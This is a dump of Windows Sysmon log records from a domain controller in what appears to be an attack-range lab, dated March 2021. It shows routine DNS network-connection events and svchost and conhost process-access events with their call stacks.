354300x80000000000000003865Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.029{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63330- 354300x80000000000000003864Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.027{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60570- 354300x80000000000000003863Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.026{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59714- 354300x80000000000000003862Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.024{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local63268- 354300x80000000000000003861Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.024{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61743- 354300x80000000000000003860Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.023{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local64947- 354300x80000000000000003859Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.021{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59667- 354300x80000000000000003858Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.021{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58463- 354300x80000000000000003857Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.020{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local58247- 354300x80000000000000003856Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.019{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58151- 354300x80000000000000003855Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.018{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57415- 354300x80000000000000003854Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.016{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63479- 354300x80000000000000003853Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.015{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63992- 354300x80000000000000003852Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.012{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local57716- 354300x80000000000000003851Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.011{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local62539- 354300x80000000000000003850Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.010{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61823- 354300x80000000000000003849Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.009{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local57714- 354300x80000000000000003848Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.009{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63797- 354300x80000000000000003847Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.008{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60525- 354300x80000000000000003846Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.007{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local58447- 354300x80000000000000003845Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.005{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61886- 354300x80000000000000003844Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.004{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63703- 354300x80000000000000003843Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.004{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local58832- 354300x80000000000000003842Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.003{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local64925- 354300x80000000000000003841Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.001{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local60335- 354300x80000000000000003840Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:08.000{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62465- 354300x80000000000000003839Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:07.999{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local61051- 354300x80000000000000003838Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:07.998{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local63865- 354300x80000000000000003837Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:07.997{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local59202- 354300x80000000000000003836Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:07.996{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local65365- 354300x80000000000000003835Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:07.995{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-892.attackrange.local53domainfalse10.0.1.14win-dc-892.attackrange.local60099- 10341000x80000000000000004182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.968{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.797{266CAFBE-646C-6064-1500-00000000AE01}13161668C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.735{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-64C2-6064-9600-00000000AE01}3000C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:10.735{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 